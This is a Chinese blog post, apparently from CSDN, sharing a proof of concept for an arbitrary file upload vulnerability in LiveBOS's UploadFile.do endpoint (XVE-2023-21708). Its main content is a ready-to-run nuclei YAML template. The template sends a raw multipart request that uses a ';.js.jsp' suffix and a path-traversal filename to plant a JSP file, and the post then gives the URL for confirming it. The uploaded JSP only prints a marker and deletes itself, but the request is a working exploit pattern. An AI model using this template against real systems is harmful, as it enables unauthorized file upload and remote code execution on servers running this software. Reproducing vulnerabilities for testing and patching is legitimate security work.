POC分享 LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)

最新推荐文章于 2024-08-08 18:22:07 发布

Sanders Amador

最新推荐文章于 2024-08-08 18:22:07 发布

阅读量150

点赞数 1

文章标签：网络网络安全 web安全

本文链接：https://blog.csdn.net/qq_56895879/article/details/140958816

版权

运行工具：projectdiscovery/nuclei: Fast and customizable vulnerability scanner based on simple YAML based DSL. (github.com)

YAML脚本：

id: file-upload-feed

info:
  name: Arbitrary File Upload in /feed/UploadFile.do
  author: your_name
  severity: high
  description: Detects arbitrary file upload vulnerability in /feed/UploadFile.do endpoint, allowing an attacker to upload and execute malicious JSP files.
  tags: file-upload, rce, jsp

requests:
  - raw:
      - |
        POST /feed/UploadFile.do;.js.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
        Connection: close
        
        ------WebKitFormBoundaryxegqoxxi
        Content-Disposition: form-data; name="file"; filename="/../../../../rce.jsp"
        Content-Type: image/jpeg
        
        <%@ page import="java.io.File" %>
        <%
         out.println("pppppppppoooooooocccccccccccc");
         String filePath = application.getRealPath(request.getServletPath());
         new File(filePath).delete();
        %>
        ------WebKitFormBoundaryxegqoxxi--

    matchers:
      - type: word
        words:
          - 'rce.jsp' # 检查响应中是否包含
        part: body

上传成功

验证url

/rce.jsp;.js.jsp

Sanders Amador

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
POC分享 LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)

【代码】POC分享 LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
复制链接

扫一扫